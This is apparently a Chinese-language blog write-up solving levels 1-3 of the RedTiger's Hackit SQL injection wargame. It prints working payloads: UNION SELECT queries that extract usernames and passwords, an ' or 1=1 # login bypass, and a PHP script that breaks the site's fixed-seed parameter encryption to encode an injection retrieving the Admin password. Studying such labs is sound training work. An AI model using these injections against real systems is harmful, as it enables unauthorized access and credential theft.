RedTiger's Hackit(level1-3)

RyoTech
754 阅读1分钟

网址:redtiger.labs.overthewire.org/

level1.

image.png

对着登陆框跑字典直接没有用,遂无思路。跑去看答案,发现点击category会直接传参...

https://redtiger.labs.overthewire.org/level1.php?cat=1

把get方法?cat=1改成?cat=2-1,正常回显,所以是不带引号的数字型注入。输入以下payload: cat=-1 union select group_concat(column_name) from information_schema.columns where table_name=level1_users

直接回显"some things is disable"于是又卡住。直接看答案,发现我简直在乱搞。正确思路是:

1.cat=1 order by i #通过增大i的值判断当前表有几列。事实上有4列,i>4无法正常回显。

2.cat=-1 union select 1,2,3,4 #判断前端显示的是哪几列。本题中显示3,4

3.由于给了表名,结合盲猜字段,输入cat=-1 union select 1,2,Username,Password from level1_users #得到答案。

level2.

image.png

提示condition,账号密码都填' or 1=1 #就能过

level3.

image.png 目标:得到Admin密码

点show userdetails,发现get了一个这个东西:usr=MDQyMjExMDE0MTgyMTQw

然后显示了这个表

image.png

显然我们要改usr来查表。但是usr加密了,直接不会。提示说利用报错,但我半天没搞出来报错。瞅了下答案,发现这信息检索绝了:

get一个数组就能引起报错。访问https://redtiger.labs.overthewire.org/level3.php?usr[]

报错

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

然后直接访问

https://redtiger.labs.overthewire.org/urlcrypt.inc

control+U看源码,发现加密和解密源码

<?php

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that
  		
	function encrypt($str)
	{
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
  
	function decrypt ($str)
	{
		srand(3284724);
		if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
		{
			$str = base64_decode($str);
			if ($str != "" && $str != null && $str != false)
			{
				$decStr = "";
				
				for ($i=0; $i < strlen($str); $i+=3)
				{
					$array[$i/3] = substr($str,$i,3);
				}

				foreach($array as $s)
				{
					$a = $s ^ rand(0, 255);
					$decStr .= chr($a);
				}
				
				return $decStr;
			}
			return false;
		}
		return false;
	}
?>

随机数种子固定,可以直接写exploit把想要注入的语句加密。接下来的思路就和level1一样了,过程写在下面的exploit里面了

<?php
	function encrypt($str)
	{
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
	#$payload="admin' order by 8 #";#最大到7
	#$payload="' union select 1,2,3,4,5,6,7 #"#26754都行
	$payload="' union select 1,password,3,4,5,6,7 from level3_users where username='Admin' #";
	echo encrypt($payload)
?>

后记:做啥啥不会,任重道远

avatar
文章
阅读
粉丝